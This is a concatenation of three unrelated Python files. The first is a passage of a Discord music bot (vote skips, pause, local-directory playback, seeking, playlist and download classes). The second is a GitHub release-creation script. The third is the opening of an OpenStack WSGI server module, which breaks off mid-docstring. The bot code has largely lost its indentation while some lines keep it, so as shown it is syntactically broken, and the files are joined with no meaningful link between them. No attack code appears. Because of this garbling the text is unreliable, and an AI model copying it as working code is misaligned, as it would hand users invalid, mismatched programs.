await ctx.send("Vote passed; current song (**"+playlist.entries[pos].name+"**) skipped.", delete_after=15)
try:
self.players[ctx.guild.id][0].stop()
except:
raise skipFailure
else:
await ctx.send("The current song (**"+playlist.entries[pos].name+"**) has been skipped. The player wasn't playing (or was downloading), but the entry was removed.", delete_after=15)
playlist.entries[pos].skipped = True
if playlist.entries[pos].downloading:
return await playlist.afterplay(None)
playlist.entries.remove(playlist.entries[pos])
                else:
                    # Same as above: capture the entry before removing it so
                    # the confirmation message names the right song.
                    removed = playlist.entries[pos]
                    removed.skipped = True
                    playlist.entries.remove(removed)
                    await ctx.send("The song (**"+removed.name+"**) at position "+str(pos+1)+" has been removed by vote.", delete_after=15)
else:
# notify how many skips there are out of 5
await ctx.send("Vote confirmed. The song (**"+playlist.entries[pos].name+"**) in position "+str(pos+1)+" needs "+str(5-len(playlist.entries[pos].skipvotes))+" more skip votes to be skipped.", delete_after=15)
@commands.command(aliases=["unpause", "resume"])
async def pause(self, ctx):
'''Pause or unpause the music'''
if ctx.guild.id not in self.players:
raise alreadyLeft
playa = self.players[ctx.guild.id][0]
playalist = self.players[ctx.guild.id][1]
if playa.is_playing():
playa.pause()
return await ctx.send(ctx.author.name +" paused the music.")
if len(playalist.entries) > 0 and playa.is_paused():
playa.resume()
return await ctx.send(ctx.author.name +" resumed the music.")
        if len(playalist.entries) == 0:
            return await ctx.send("I cannot unpause because the playlist is empty.")
try:
playa.resume()
except:
pass
@commands.command(hidden=True)
@commands.check(Perms.is_owner)
async def download(self, ctx):
''' download the first entry
Testing only'''
await self.players[ctx.guild.id][1].entries[0].download()
@commands.command(hidden=True)
@commands.check(Perms.is_owner)
async def forceplay(self, ctx):
''' force the first entry to play
Testing only'''
try:
await self.players[ctx.guild.id][1].entries[0].play(self.players[ctx.guild.id][0])
except:
traceback.print_exc()
def recursivelyGetAudioFiles(self, dir):
''' get the files in a directory
at this point, dir should be something like:
C:/audiodirectory/
'''
output = []
folders = []
try:
folders = [x for x in os.scandir(dir) if not x.is_file()]
except:
folders = []
types = ("*.wav", "*.mp3", "*.flac", "*.ogg", "*.mp4", "*.mov", "*.m4v")
for type in types:
try:
output.extend(glob.glob(os.path.join(dir, type)))
except:
pass
for folder in folders:
            path = folder.path  # use DirEntry.path; os.path.splitext would mangle folder names containing dots
output.extend(self.recursivelyGetAudioFiles(path + "/"))
return output
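    # Illustrative call (the path is a placeholder): given "C:/audiodirectory/",
    # this walks every subfolder and returns a flat list such as
    # ["C:/audiodirectory/a.mp3", "C:/audiodirectory/sub/b.wav", ...].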
@commands.command(hidden=True, aliases=["dir2play"])
@commands.check(Perms.is_owner)
async def recursiveplay(self, ctx, *, directory:str):
''' queue an entire directory of songs recursively.
also works with -b'''
try:
# dont need to check for vc unless the command is open to all
if ctx.guild.id not in self.players and ctx.author.voice:
await self.summon.invoke(ctx)
else:
if ctx.author.voice:
                    if ctx.author.voice.channel.id != self.players[ctx.guild.id][1].voice_channel.id and ctx.author.voice.channel.id != self.players[ctx.guild.id][0].channel.id:
if not (self.players[ctx.guild.id][0].is_playing()):
await self.summon.invoke(ctx)
change_later = await ctx.send("Getting recursive listing...")
try:
self.players[ctx.guild.id][1].waitingTask.cancel()
except:
pass
bassboost = False
if directory.split()[0].lower() == "-b":
if len(directory.split()) == 1:
await change_later.delete()
raise specific_error("You can't bass boost nothing.")
bassboost = True
directory = " ".join(directory.split()[1:])
if directory[-1] != "/":
directory += "/"
            entries = self.recursivelyGetAudioFiles(directory)
            if not entries:
                await change_later.delete()
                raise specific_error("I could not find any audio files in that directory.")
position = 1
count = 0
entry = None
title = ""
try:
for song in entries:
title = re.search(r"([^\\/]*$)", song).group(0)
entry, position = await self.players[ctx.guild.id][1].add_entry(queuer=ctx.author, bass=bassboost,
forced_info={"title": title, "filepath": song})
count += 1
except:
traceback.print_exc()
await change_later.delete()
raise entryFailure
position -= len(entries) - 1
sendMessage = "Found and queued **%s** songs starting at position %s in the queue"
self.players[ctx.guild.id][1].chan = ctx.channel
if position == 1 and not self.players[ctx.guild.id][0].is_playing():
sendMessage = "Found and queued **%s** songs to play as soon as possible!"
sendMessage %= count
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
self.players[ctx.guild.id][1].temp_message = change_later
cur_entr = self.players[ctx.guild.id][1].current_entry()
await self.players[ctx.guild.id][1].entries[0].download()
if cur_entr.skipped:
return
self.players[ctx.guild.id][1].message = await self.players[ctx.guild.id][1].chan.send(
"Now playing in " + self.players[ctx.guild.id][0].channel.name + ": " + str(
self.players[ctx.guild.id][1].entries[0]))
await self.players[ctx.guild.id][1].entries[0].play(self.players[ctx.guild.id][0])
else:
try:
time_to = await self.players[ctx.guild.id][1].time_to(position)
sendMessage += " - Rough estimation for when it will play: %s"
except:
time_to = "Error"
try:
sendMessage %= (count, position, time_to)
except:
                    sendMessage = "There was an error creating the final string, but " + str(count) + " songs should have been queued anyways."
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
except:
traceback.print_exc()
@commands.command(hidden=True, aliases=["dirplay"])
@commands.check(Perms.is_owner)
async def directoryplay(self, ctx, *, song:str):
''' play something straight from a filepath
also allows the use of -b
if you use -b you probably have to use quotes i dunno
Testing only (functional)'''
# dont need to check for vc unless the command is open to all
if ctx.guild.id not in self.players and ctx.author.voice:
await self.summon.invoke(ctx)
else:
if ctx.author.voice:
                if ctx.author.voice.channel.id != self.players[ctx.guild.id][1].voice_channel.id and ctx.author.voice.channel.id != self.players[ctx.guild.id][0].channel.id:
if not(self.players[ctx.guild.id][0].is_playing()):
await self.summon.invoke(ctx)
change_later = await ctx.send("Adding manual link...")
try:
self.players[ctx.guild.id][1].waitingTask.cancel()
except:
pass
bassboost = False
if song.split()[0].lower() == "-b":
if len(song.split()) == 1:
await change_later.delete()
raise specific_error("You can't bass boost nothing.")
bassboost = True
song = " ".join(song.split()[1:])
if not os.path.isfile(song):
await change_later.delete()
raise specific_error("That file does not exist.")
try:
title = re.search(r"([^\\/]*$)", song).group(0)
entry, position = await self.players[ctx.guild.id][1].add_entry(queuer=ctx.author, bass=bassboost, forced_info={"title":title, "filepath":song})
except:
traceback.print_exc()
await change_later.delete()
raise entryFailure
sendMessage = "Found and queued **%s** at position %s in the queue"
self.players[ctx.guild.id][1].chan = ctx.channel
if position == 1 and not self.players[ctx.guild.id][0].is_playing():
sendMessage = "Found and queued **%s** to play as soon as possible!"
sendMessage %= title
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
self.players[ctx.guild.id][1].temp_message = change_later
cur_entr = self.players[ctx.guild.id][1].current_entry()
await self.players[ctx.guild.id][1].entries[0].download()
if cur_entr.skipped:
return
self.players[ctx.guild.id][1].message = await self.players[ctx.guild.id][1].chan.send("Now playing in "+self.players[ctx.guild.id][0].channel.name+": "+str(self.players[ctx.guild.id][1].entries[0]))
await self.players[ctx.guild.id][1].entries[0].play(self.players[ctx.guild.id][0])
else:
try:
time_to = await self.players[ctx.guild.id][1].time_to(position)
sendMessage += " - Rough estimation for when it will play: %s"
except:
time_to = "Error"
try:
sendMessage %= (title, position, time_to)
except:
sendMessage = "There was an error creating the final string, but "+title+" should have been queued anyways."
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
@commands.command()
async def seek(self, ctx, position:str):
''' Seek in the current audio to a position
The given position should be in an easy to interpret format.
The most complicated format is: HH:MM:SS.msms
        If a plain integer or decimal is given, it is interpreted as that many seconds.
All seek times are from the beginning of the file.
If the seek time is not within the bounds of the file, the audio ends and the playlist continues.
If there is an error in your formatting, the audio ends and the playlist continues.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
real_playa = self.players[ctx.guild.id][0]
if not real_playa.is_playing():
raise specific_error("The music is paused or nothing is queued.")
entry = self.players[ctx.guild.id][1].entries[0]
playa = self.players[ctx.guild.id][1]
try:
self.players[ctx.guild.id][0].source = discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(entry.filename, before_options="-ss "+position), volume=playa.volume)
try:
pos = int(position)
except:
return await ctx.send("I moved the current position to "+position, delete_after=15)
            hours, rem = divmod(pos, 3600)
            mins, pos = divmod(rem, 60)
return await ctx.send(f"I moved the current position to {hours:02}:{mins:02}:{pos:02}", delete_after=15)
except:
traceback.print_exc()
class Entry:
def __init__(self, playlist, queuer, name, duration=0, filename=None, url=None, bass=False, Filepath=None):
self.downloading = False
        self.is_downloaded = bool(Filepath)
self.playlist = playlist
self.author = queuer.name
self.author_obj = queuer
self.name = name
self.filepath = Filepath #this is used if we are not going to download the file
self.filename = filename #this is the direct filepath for a youtube download
self.duration = duration
self.skipvotes = set()
self.skipped = False
self.url = url
self.bassy = bass
self.boosted = False
def __str__(self):
if self.bassy:
return "**"+self.name+"** queued by "+self.author+". **Duration**: "+str(datetime.timedelta(seconds=self.duration))+" **Bass Boosted**"
else:
return "**"+self.name+"** queued by "+self.author+". **Duration**: "+str(datetime.timedelta(seconds=self.duration))
async def download(self):
if self.filepath:
self.downloading = False
self.is_downloaded = True
return
if self.downloading or self.is_downloaded:
return
self.downloading = True
if os.path.isfile(self.filename):
self.downloading = False
self.is_downloaded = True
return
try:
if not os.path.exists(self.playlist.downloader.path+"/"+str(self.playlist.chan.guild.id)):
os.makedirs(self.playlist.downloader.path+"/"+str(self.playlist.chan.guild.id))
result = await self.playlist.downloader.get_the_stuff(self.playlist.loop, self.url, download=True)
except:
raise downloaderBroke(self.playlist.stored_ctx)
if result is None:
raise downloaderBroke(self.playlist.stored_ctx)
self.downloading = False
self.is_downloaded = True
if self.skipped:
return await self.playlist.prune_song(self)
if self.bassy:
pass
# if not self.boosted:
# try:
# proc = await asyncio.create_subprocess_exec("ffmpeg", "-loglevel", "quiet", "-y", "-i", self.filename, "-af",
# "bass=g=15", self.filename+"_bass_"+self.filename[-5:])
# await proc.wait()
# await self.playlist.prune_song(self)
# self.filename = self.filename+"_bass_"+self.filename[-5:]
# except:
# traceback.print_exc()
# self.boosted = True
async def download_play(self, player):
        ''' download and play a song; fallback for when a song got deleted or was never downloaded'''
if self.playlist.voice_channel.id != player.channel.id:
self.playlist.voice_channel = player.channel
try:
await self.playlist.message.edit(content="Now (redownloading) in "+self.playlist.voice_channel.name+": "+str(self))
except:
pass
if self.skipped: #the song was skipped before done downloading
return await self.playlist.prune_song(self)
await self.download()
await self.play(player)
async def play(self, player):
''' this plays the song '''
#player.play(discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(song), volume=0.5), after=lambda e: print("done", e))
if self.downloading:
await self.playlist.message.edit(content="Now (finishing download) in "+self.playlist.voice_channel.name+": "+str(self))
while self.downloading:
await asyncio.sleep(0.25)
if not self.is_downloaded:
self.playlist.loop.create_task(self.download_play(player))
return
if self.skipped:
return await self.playlist.prune_song(self)
self._play_sync(player)
def _play_sync(self, player):
''' i lied, this plays the song'''
if self.bassy:
player.play(discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(self.filename, options="-af bass=g=15"), volume=self.playlist.volume), after=self._afterplay)
else:
player.play(discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(self.filename), volume=self.playlist.volume), after=self._afterplay)
def _afterplay(self, error):
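        # discord.py invokes this callback from its audio thread, so the
        # coroutine is handed back to the bot's event loop thread-safely;
        # future.result() blocks until afterplay() finishes and re-raises
        # any exception it threw.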
coro = self.playlist.afterplay(error)
future = asyncio.run_coroutine_threadsafe(coro, self.playlist.loop)
future.result()
class Playlist:
def __init__(self, bot, chan, message, voice_channel, player, ctx):
self.bot = bot #BarryBot
self.downloader = bot.downloader
self.entries = deque()
self.loop = bot.loop
self.chan = chan
self.message = message
self.temp_message = None
self.voice_channel = voice_channel
self.volume = float(bot.settings[chan.guild.id].features["playervol"])/100
self.player = player
self.stored_ctx = ctx
self.waitingTask = None
def __iter__(self):
return iter(self.entries)
def shuffle(self):
random.shuffle(self.entries)
def clear(self):
if self.player.players[self.chan.guild.id][0].is_playing():
playing = self.entries[0]
self.entries.clear()
self.entries.append(playing)
else:
self.entries.clear()
async def add_entry(self, url=None, queuer=None, bass=False, forced_info=None, **meta):
if forced_info:
entry = Entry(
self,
queuer,
forced_info.get('title', "Untitled"),
0,
forced_info.get("filepath", "Error"),
url,
bass,
forced_info.get("filepath", "Error"),
)
self.entries.append(entry)
return entry, len(self.entries)
try:
            self.downloader.ytdl.params['outtmpl'] = os.path.join(self.downloader.path, str(self.chan.guild.id), self.downloader.tPN)
info = await self.downloader.get_the_stuff(self.loop, url, download=False)
except:
raise entryFailure
entry = Entry(
self,
queuer,
info.get('title', 'Untitled'),
info.get('duration', 0) or 0,
self.downloader.ytdl.prepare_filename(info),
url,
bass,
**meta
)
self.entries.append(entry)
if self.entries[0] is entry:
pass
#play the first song
return entry, len(self.entries)
async def time_to(self, position):
estimated_time = sum([entry.duration for entry in islice(self.entries, position-1)])
return datetime.timedelta(seconds=estimated_time)
def current_entry(self):
return self.entries[0]
async def afterplay(self, error, playNext=True):
if error:
print(error)
raise playerError(self.stored_ctx)
try:
if self.entries[0].filepath: #we are assuming we were triggering this function based off of playing the first entry and we are going to have serious issues if that isnt the case
pass #this just skips deleting the file if it was triggered by something other than a link or search, something we dont want to deleted
else:
dontDelete = False
if len(self.entries) > 1:
otherentries = [entry for entry in self.entries] #this is unfortunate because you arent allowed to copy.deepcopy() a deque in another thread... something about pickling, im no genius
otherentries.pop(0)
for entry in otherentries:
if entry.filename == self.entries[0].filename:
dontDelete = True
break
if not dontDelete:
done = False
for x in range(10): #trying 10 good times
try:
os.unlink(self.entries[0].filename)
done = True
break
except:
await asyncio.sleep(0.25)
if not done:
self.loop.create_task(self.prune_song(self.entries[0]))
self.entries.popleft()
try:
await self.message.delete()
except:
pass
try:
await self.temp_message.delete()
except:
pass
if self.voice_channel.id != self.player.players[self.chan.guild.id][0].channel.id:
self.voice_channel = self.player.players[self.chan.guild.id][0].channel
if len(self.entries) > 0 and playNext:
editLater = False
if not self.current_entry().is_downloaded:
self.message = await self.chan.send("Now (downloading) in "+self.voice_channel.name+": "+str(self.entries[0]))
editLater = True
try:
await self.entries[0].download()
except:
traceback.print_exc()
try:
await self.entries[0].play(self.player.players[self.chan.guild.id][0])
except:
traceback.print_exc()
if editLater:
await self.message.edit(content="Now playing in "+self.voice_channel.name+": "+str(self.entries[0]))
else:
self.message = await self.chan.send("Now playing in "+self.voice_channel.name+": "+str(self.entries[0]))
if len(self.entries) > 1:
await self.entries[1].download()
else:
lengthoftime = int(self.bot.settings[self.chan.guild.id].features["playerleave"])
await self.chan.send("The playlist is empty. The music has ended.", delete_after=lengthoftime)
self.waitingTask = asyncio.ensure_future(self._eventually_leave(lengthoftime))
except:
traceback.print_exc()
async def _eventually_leave(self, time):
''' leave the channel eventually, but this is cancellable'''
try:
await asyncio.sleep(time)
await self.player.players[self.chan.guild.id][0].disconnect()
del self.player.players[self.chan.guild.id]
except:
pass
async def prune_song(self, given): #given is an Entry object
''' given an entry it tries to run an afterplay but doesnt play anything after (basically it just deletes the file)'''
#removes the song from the directory but still leaves it if it exists later in the playlist for some reason
#this is meant to just clean up the directory, not remove stuff from the playlist
try:
if given.filepath:
return
else:
dontDelete = False
if len(self.entries) > 1:
otherentries = [entry for entry in self.entries]
otherentries.pop(0)
for entry in otherentries:
if entry.filename == given.filename:
dontDelete = True
break
if not dontDelete:
done = False
for x in range(30): #give it a good 30 tries instead because some songs could download for a long time
try:
os.unlink(given.filename)
done = True
break
except OSError as e:
if e.errno == errno.ENOENT:
done = True
print("tried to delete a file that doesn't exist. exiting early.")
break
else:
print("failed to delete currently downloading song")
await asyncio.sleep(0.5)
if not done:
self.loop.call_later(60, self.prune_song_retry, given)
except:
traceback.print_exc()
def prune_song_retry(self, given): #its prune_song but a retry because sometimes the download takes way too long and we dont want to waste time in a loop
''' to keep trying 30 times every 15 seconds every minute because we dont want to stick to this loop forever
also this is a failsafe to hopefully delete stuff if it ends up skipped or loose and should be deleted'''
self.loop.create_task(self.prune_song(given)) #but now that i think back, this might be unnecessary... still, its a fallback if somehow the song starts downloading after being queued to prune or ends up being pulled by another program and cant be deleted
class Downloader:
def __init__(self, download_path):
self.threadpool = ThreadPoolExecutor(max_workers=2)
self.ytdl = youtube_dl.YoutubeDL(ytdl_options)
self.tPN = self.ytdl.params['outtmpl']
self.ytdl.params['outtmpl'] = os.path.join(download_path, self.tPN)
self.path = download_path
async def get_the_stuff(self, loop, *args, **kwargs):
return await loop.run_in_executor(self.threadpool, functools.partial(self.ytdl.extract_info, *args, **kwargs))
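# Minimal usage sketch for Downloader, inside a coroutine (assumes the
# ytdl_options dict defined elsewhere in this file and a running asyncio loop;
# the cache path is a placeholder):
#   downloader = Downloader("audio_cache")
#   info = await downloader.get_the_stuff(loop, url, download=False)
#   filename = downloader.ytdl.prepare_filename(info)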
|
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import tempfile
import dateutil.parser
import magic
import requests
from platforms.common import ReleaseException, run
MESSAGE_PROMPT_TEMPLATE = """\
# Add release notes below. Any lines starting with '#' will be ignored.
{default_message}
# Commits since last release:
#
{commit_messages}
"""
MESSAGE_TEMPLATE = """\
Includes various improvements and bug fixes, viewable here: {html_url}
"""
def get_version_and_timestamp_from_release(release):
""" Returns the version (without a 'v' prefix) and the timestamp of the release """
release_version = release["tag_name"].lstrip("v")
release_timestamp = dateutil.parser.parse(release["created_at"]).strftime("%s")
return release_version, release_timestamp
def get_token(token_file):
"""
Reads the first line from token_file to get a token
"""
with open(token_file, "r") as fin:
ret = fin.read().strip()
if not ret:
raise ReleaseException("No valid token found in {}".format(token_file))
return ret
def get_current_user(github_token, prefer_fb_email=True):
""" Gets info about the current github user """
url = "https://api.github.com/user"
emails_url = "https://api.github.com/user/emails"
headers = get_headers(github_token)
response = requests.get(url, headers=headers)
response.raise_for_status()
ret = response.json()
    # The public email can be null when the user hides it, so guard before
    # calling endswith, and short-circuit on prefer_fb_email first.
    if prefer_fb_email and not (ret["email"] or "").endswith("@fb.com"):
while emails_url:
response = requests.get(emails_url, headers=headers)
response.raise_for_status()
fb_email = next(
(
email["email"]
for email in response.json()
if email["verified"] and email["email"].endswith("@fb.com")
),
None,
)
if fb_email:
ret["email"] = fb_email
break
else:
emails_url = response.links.get("next", {}).get("url")
return ret
def get_commit(repository, github_token, commit):
""" Gets a specific commit's info from github """
url = "https://api.github.com/repos/{}/commits/{}".format(repository, commit)
headers = get_headers(github_token)
logging.info("Fetching commit {} for {}".format(commit, repository))
response = requests.get(url, headers=headers)
response.raise_for_status()
return response.json()["sha"]
def get_latest_release(repository, github_token):
""" Gets the latest release object from github or None if there are no releases """
url = "https://api.github.com/repos/{}/releases/latest".format(repository)
headers = get_headers(github_token)
logging.info("Fetching latest release for {}".format(repository))
response = requests.get(url, headers=headers)
if response.status_code == 404:
return None
response.raise_for_status()
ret = response.json()
return ret
def get_summary_from_commit(commit):
""" Takes a full commit message, and gives something abbreviated for changelogs """
message = commit["commit"]["message"].split("\n")[0]
return "{}: {}".format(commit["sha"], message)
def get_summaries_between_releases(
repository, github_token, earliest_revision, latest_revision
):
"""
Gets all of the commit messages (as a list) for commits between earliest_revision
and latest_revision. These messages are summaries, not the full message
"""
url = "https://api.github.com/repos/{}/compare/{}...{}".format(
repository, earliest_revision, latest_revision
)
headers = get_headers(github_token)
response = requests.get(url, headers=headers)
response.raise_for_status()
js = response.json()
return (
js["html_url"],
[get_summary_from_commit(commit) for commit in js["commits"]],
)
def get_headers(github_token):
return {"Authorization": "token " + github_token}
def create_release(repository, github_token, message, version_tag, commit):
"""
Creates a release on github and returns that data
Args:
repository: The name of the repository to work on
github_token: The token to use for github operations
message: The message to put in the body of the release
version_tag: The tag to have github create. This is also used in the release
title
commit: The commit to pin the release to
"""
url = "https://api.github.com/repos/{}/releases".format(repository)
data = {
"tag_name": version_tag,
"target_commitish": commit,
"name": "Release {}".format(version_tag),
"body": message.format(tag=version_tag),
# Draft would be nice, but then the releases don't show up in the API,
# and we can't get tarball/zipball urls until publishing :(
"draft": False,
}
headers = get_headers(github_token)
logging.info("Creating a new release")
response = requests.post(url, json=data, headers=headers)
response.raise_for_status()
ret = response.json()
logging.info("Created new release at {}".format(ret["html_url"]))
return ret
def get_all_releases(repository, github_token):
""" Get all of the releases from github for a repository. Useful for changelogs """
url = "https://api.github.com/repos/{}/releases".format(repository)
headers = get_headers(github_token)
logging.info("Getting all releases")
releases = []
while url:
response = requests.get(url, headers=headers)
response.raise_for_status()
releases.extend(response.json())
if "next" in response.links:
url = response.links["next"]["url"]
else:
url = None
logging.info("Got {} releases".format(len(releases)))
return releases
def get_release_for_tag(repository, github_token, version_tag):
""" Gets the release from github for a specific git tag """
url = "https://api.github.com/repos/{}/releases/tags/{}".format(
repository, version_tag
)
headers = get_headers(github_token)
logging.info(
"Getting release information for {} tagged {}".format(repository, version_tag)
)
response = requests.get(url, headers=headers)
response.raise_for_status()
ret = response.json()
logging.info(
"Got release information for {} tagged {} ({})".format(
repository, version_tag, ret["html_url"]
)
)
return ret
def prompt_for_message(html_url, summaries):
"""
Prompts the user for a release message in an editor, showing them the commits since
last release, and returns what the user specified
Args:
html_url: The url to see the difference between the current commit and the
commit for the previous release.
summaries: The commit summaries to display to the user
"""
default_message = create_default_message(html_url)
summaries_text = "\n".join(("# " + line for line in summaries))
full_message = MESSAGE_PROMPT_TEMPLATE.format(
default_message=default_message, commit_messages=summaries_text
)
temp_fd, temp_path = tempfile.mkstemp()
try:
with open(temp_path, "w") as fout:
fout.write(full_message)
editor = os.environ.get("EDITOR", "vim")
run([editor, temp_path])
with open(temp_path, "r") as fin:
            # Lines read from the file keep their trailing newline, so join
            # with the empty string to avoid doubling every line break.
            message = "".join(line for line in fin if not line.startswith("#"))
message = message.strip()
if not message:
raise ReleaseException("No valid message was provided")
return message
finally:
if os.path.exists(temp_path):
os.remove(temp_path)
def create_default_message(html_url):
return MESSAGE_TEMPLATE.format(html_url=html_url)
def add_assets(release, github_token, path):
"""
Add an asset at `path` to a specific release
Args:
release: The release object from github
github_token: The token to modify the release
path: The path of the file to upload
Returns:
The asset object from github
"""
filename = os.path.basename(path)
url = release["upload_url"].replace("{?name,label}", "?name=" + filename)
headers = get_headers(github_token)
headers["Content-Type"] = magic.from_file(path, mime=True)
logging.info("Adding {} at {} to release".format(filename, path))
with open(path, "rb") as fin:
response = requests.post(url, headers=headers, data=fin)
if response.status_code == 422:
raise ReleaseException(
"A file by the name of {} is already attached to {}".format(
filename, release["html_url"]
)
)
response.raise_for_status()
ret = response.json()
logging.info("Added {} to release at {}".format(filename, release["html_url"]))
return ret
def create_new_release(
repository, github_token, version_tag, message, should_prompt_for_message
):
"""
Creates a new release, optionally prompting the user for a release message
Args:
repository: The github repository
github_token: The github token that can create releases
        version_tag: The version tag that should be created at the current 'master'
message: If None, prompt the user for a message (or create a default one),
otherwise use this message for the release summary.
should_prompt_for_message: If false, just create a release that points to the
list of changes between the last release and this one.
Otherwise, prompt the user for a message.
Returns:
The github repository object
"""
master_commit = get_commit(repository, github_token, "master")
if not message:
latest_release = get_latest_release(repository, github_token)
commit_summaries = []
html_url = ""
if latest_release:
latest_release_hash = get_commit(
repository, github_token, latest_release["tag_name"]
)
html_url, commit_summaries = get_summaries_between_releases(
repository, github_token, latest_release_hash, master_commit
)
if should_prompt_for_message:
message = prompt_for_message(html_url, commit_summaries)
else:
message = create_default_message(html_url)
release = create_release(
repository, github_token, message, version_tag, master_commit
)
logging.info("Created release at {}".format(release["html_url"]))
return release
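# Illustrative end-to-end flow (repository, token path, and asset path are
# placeholders):
#   token = get_token("/path/to/github_token")
#   release = create_new_release("org/repo", token, "v1.2.3", None, True)
#   add_assets(release, token, "dist/tool.tar.gz")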
|
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utility methods for working with WSGI servers."""
from __future__ import print_function
import copy
import os
import socket
import eventlet
import eventlet.wsgi
import greenlet
from paste import deploy
import routes.middleware
import webob.dec
import webob.exc
from oslo_log import log as logging
from oslo_service import _options
from oslo_service import service
from oslo_service import sslutils
from oslo_service._i18n import _, _LE, _LI
LOG = logging.getLogger(__name__)
def list_opts():
"""Entry point for oslo-config-generator."""
return [(None, copy.deepcopy(_options.wsgi_opts))]
def register_opts(conf):
"""Registers WSGI config options."""
return conf.register_opts(_options.wsgi_opts)
class InvalidInput(Exception):
message = _("Invalid input received: "
"Unexpected argument for periodic task creation: %(arg)s.")
class Server(service.ServiceBase):
"""Server class to manage a WSGI server, serving a WSGI application."""
def __init__(self, conf, name, app, host='0.0.0.0', port=0, pool_size=None,
protocol=eventlet.wsgi.HttpProtocol, backlog=128,
use_ssl=False, max_url_len=None):
"""Initialize, but do not start, a WSGI server.
:param conf: Instance of ConfigOpts.
:param name: Pretty name for logging.
:param app: The WSGI application to serve.
:param host: IP address to serve the application.
        :param port: Port number to serve the application.
:param pool_size: Maximum number of eventlets to spawn concurrently.
:param protocol: Protocol class.
:param backlog: Maximum number of queued connections.
:param use_ssl: Wraps the socket in an SSL context if True.
:param max_url_len: Maximum length of permitted URLs.
:returns: None
:raises: InvalidInput
:raises: EnvironmentError
"""
self.conf = conf
self.conf.register_opts(_options.wsgi_opts)
self.default_pool_size = self.conf.wsgi_default_pool_size
# Allow operators to customize http requests max header line size.
eventlet.wsgi.MAX_HEADER_LINE = conf.max_header_line
self.name = name
self.app = app
self._server = None
self._protocol = protocol
self.pool_size = pool_size or self.default_pool_size
self._pool = eventlet.GreenPool(self.pool_size)
self._logger = logging.getLogger("eventlet.wsgi.server")
self._use_ssl = use_ssl
self._max_url_len = max_url_len
self.client_socket_timeout = conf.client_socket_timeout or None
if backlog < 1:
            # Exception subclasses don't accept arbitrary keyword arguments,
            # so pass the message positionally.
            raise InvalidInput(_('The backlog must be more than 0'))
bind_addr = (host, port)
# TODO(dims): eventlet's green dns/socket module does not actually
# support IPv6 in getaddrinfo(). We need to get around this in the
# future or monitor upstream for a fix
try:
info = socket.getaddrinfo(bind_addr[0],
bind_addr[1],
socket.AF_UNSPEC,
socket.SOCK_STREAM)[0]
family = info[0]
bind_addr = info[-1]
except Exception:
family = socket.AF_INET
if self._use_ssl:
sslutils.is_enabled(conf)
try:
self._socket = eventlet.listen(bind_addr, family, backlog=backlog)
except EnvironmentError:
LOG.error(_LE("Could not bind to %(host)s:%(port)s"),
{'host': host, 'port': port})
raise
(self.host, self.port) = self._socket.getsockname()[0:2]
LOG.info(_LI("%(name)s listening on %(host)s:%(port)s"),
{'name': self.name, 'host': self.host, 'port': self.port})
def start(self):
"""Start serving a WSGI application.
:returns: None
"""
# The server socket object will be closed after server exits,
# but the underlying file descriptor will remain open, and will
# give bad file descriptor error. So duplicating the socket object,
# to keep file descriptor usable.
self.dup_socket = self._socket.dup()
self.dup_socket = self._set_socket_opts(self.dup_socket)
if self._use_ssl:
self.dup_socket = sslutils.wrap(self.conf, self.dup_socket)
wsgi_kwargs = {
'func': eventlet.wsgi.server,
'sock': self.dup_socket,
'site': self.app,
'protocol': self._protocol,
'custom_pool': self._pool,
'log': self._logger,
'log_format': self.conf.wsgi_log_format,
'debug': False,
'keepalive': self.conf.wsgi_keep_alive,
'socket_timeout': self.client_socket_timeout
}
if self._max_url_len:
wsgi_kwargs['url_length_limit'] = self._max_url_len
self._server = eventlet.spawn(**wsgi_kwargs)
def _set_socket_opts(self, _socket):
_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# sockets can hang around forever without keepalive
_socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# This option isn't available in the OS X version of eventlet
if hasattr(socket, 'TCP_KEEPIDLE'):
_socket.setsockopt(socket.IPPROTO_TCP,
socket.TCP_KEEPIDLE,
self.conf.tcp_keepidle)
return _socket
def reset(self):
"""Reset server greenpool size to default.
:returns: None
"""
self._pool.resize(self.pool_size)
    def stop(self):
        """Stop the eventlet server; new connections are no longer accepted.
:returns: None
"""
LOG.info(_LI("Stopping WSGI server."))
if self._server is not None:
# let eventlet close socket
self._pool.resize(0)
self._server.kill()
    def wait(self):
        """Block until the server has stopped.
Waits on the server's eventlet to finish, then returns.
:returns: None
"""
try:
if self._server is not None:
num = self._pool.running()
                LOG.debug("Waiting for WSGI server to finish %d requests.", num)
self._pool.waitall()
except greenlet.GreenletExit:
LOG.info(_LI("WSGI server has stopped."))
class Request(webob.Request):
pass
class Router(object):
"""WSGI middleware that maps incoming requests to WSGI apps."""
def __init__(self, mapper):
"""Create a router for the given routes.Mapper.
Each route in `mapper` must specify a 'controller', which is a
WSGI app to call. You'll probably want to specify an 'action' as
well and have your controller be an object that can route
the request to the action-specific method.
Examples:
mapper = routes.Mapper()
sc = ServerController()
# Explicit mapping of one route to a controller+action
mapper.connect(None, '/svrlist', controller=sc, action='list')
# Actions are all implicitly defined
mapper.resource('server', 'servers', controller=sc)
